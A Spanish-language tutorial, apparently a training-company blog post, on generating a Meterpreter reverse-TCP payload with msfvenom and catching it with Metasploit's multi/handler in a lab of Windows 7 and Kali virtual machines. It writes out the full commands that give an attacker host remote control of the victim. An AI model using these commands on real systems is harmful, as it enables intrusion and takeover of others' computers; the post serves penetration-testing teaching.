¿Cómo crear un malware con Metasploit?

Autor: | Última modificación: 6 de octubre de 2022 | Tiempo de Lectura: 3 minutos

¿Quieres aprender cómo crear un malware con Metasploit para un ejercicio de pentesting?

Los malwares o programas maliciosos están diseñados para ejecutar tareas perjudiciales para un sistema informático. En el cibercrimen, se utilizan para robar información, dinero y propiedad intelectual. De hecho, también pueden usarse en el marco de conflictos internacionales y seguridad de los estados.

Debido al prolífico uso que se le da a este tipo de programas, la ciberseguridad se ha convertido en una prioridad para las organizaciones, compañías e individuos de todo el mundo. Para evitar el malware, se han desarrollado softwares antivirus que sirven para detectarlos y monitorizar los daños que le hacen al sistema.

El estudio de malwares también se debe hacer de manera activa si se quiere entender cómo funcionan. Es decir, para comprender un programa malicioso, es importante saber ejecutarlo e, incluso, construirlo. Por ese motivo, en este post, enseñaremos una técnica de pentesting para generar y ejecutar un software malicioso en una máquina virtual de laboratorio. A continuación, te enseñaremos cómo crear un malware con Metasploit.

¿Cómo crear un malware con metasploit?

Existen diferentes métodos para desarrollar un malware, dado que son programas casi tan antiguos como la propia computación. No obstante, a continuación explicaremos cómo crear un malware que nos permita ejecutar tareas de forma remota en la máquina vulnerada.

Antes de comenzar, es necesario aclarar que este tutorial se realiza con fines educativos. El propósito de esta técnica es entender cómo funcionan los softwares maliciosos con el fin de evitarlos.

Preparación de las máquinas virtuales

Crea dos máquinas virtuales con tu software de virtualización de preferencia con las siguientes características:

  1. Sistema operativo Windows 7, con una versión lo más antigua posible para evitar que tenga acutalizaciones de seguridad.
  2. Sistema operativo Kali Linux.

Creación del malware

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

La herramienta de Metasploit que utilizaremos en este tutorial para crear un fichero malicioso es Msfvenom. Este software permite generar archivos ejecutables para iniciar el payload en la máquina vulnerada. Dicho payload es un software malicioso capaz de ejecutar comandos de manera remota en el ordenador.

Para crear el ejecutable de un payload con Metasploit, abre una terminal en tu máquina virtual con Kali Linux y ejecuta un comando con la siguiente estructura, para activar la herramienta Msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST = <ip local> LPORT = <puerto> -f exe > nombredelpayload.exe
  • Msfvenom es la herramienta para crear el ejecutable «nombredelpayload.exe».
  • – p es un parámetro para establecer el payload de Metasploit que deseas utilizar. Para este ejercicio, hemos escogido un payload tipo Meterpreter, que nos dará completo acceso a la máquina remota.
  • LHOST es la variable que significa host local. Allí debes establecer la dirección IP de tu máquina virtual con Kali. Recuerda usar el modo de red NAT en tus máquinas virtuales, así no utilizarán la dirección IP real de tu red. Para este ejemplo, usaremos la dirección IP ficticia 192.168.172.128
  • LPORT significa puerto local y, allí, puedes escoger cualquiera. Para el ejemplo, elegiremos el número 5555.

En un ejemplo real, el comando se vería así:

msfvenom -p windows/meterpreter/reverse_tcp LHOST = 192.168.172.128 LPORT = 5555 -f exe > ejemplo.exe

Sin embargo, al infiltrar el archivo «ejemplo.exe», que es nuestro malware, en la máquina virtual Windows 7 y ejecutarlo, ¿qué sucedería? Aún nada, porque para ejecutar el payload meterpreter es necesario estar a la escucha desde el puerto 5555 en Kali. Para ello, usaremos el framework de Metasploit.

Escuchar desde el puerto

Ya hemos visto cómo crear un malware con la herramienta Msfvenom de Metasploit. Ahora, completaremos el proceso ejecutando la escucha del puerto 5555 en la máquina virtual con Kali. Para hacer esta acción, comienza iniciando la consola de Metasploit con el comando:

msfconsole

Ahora, usaremos un exploit de tipo handler con el siguiente comando:

use exploit/multi/handler

Para establecer el uso del payload que creamos en el paso anterior, utiliza:

set payload windows/meterpreter/reverse_tcp

También debes establecer valores con las siguientes variables:

set LHOST <ip local>
set LPORT <puerto local>
  • Para el valor LHOST, introduce la dirección IP de tu máquina con Kali.
  • Para el valor LPORT, introduce el número del puerto que hayas elegido.

Finalmente, ejecuta el comando run para quedar a la escucha de lo que suceda en ese puerto, así:

run

Ahora sí, cuando ejecutes el archivo malicioso «ejemplo.exe» en la máquina virtual con Windows 7, verás que se activará el payload de Meterpreter en la consola de Metasploit. Por medio de este payload, obtendrás control total sobre la máquina vulnerada.

¿Cómo aprender más?

Si quieres aprender más sobre cómo crear un malware, en KeepCoding te ofrecemos nuestro Ciberseguridad Full Stack Bootcamp. En esta formación intensiva podrás aprender en vivo y con los mejores profesores sobre temas como pentesting, criptografía, análisis de malware y mucho más. ¡No sigas esperando e inscríbete ya para convertirte en un experto de la seguridad informática!

[email protected]

Días

ciberseguridad full stack bootcamp

Conviértete en experto en Ciberseguridad y consigue el empleo que sueñas

becas | opciones de financiación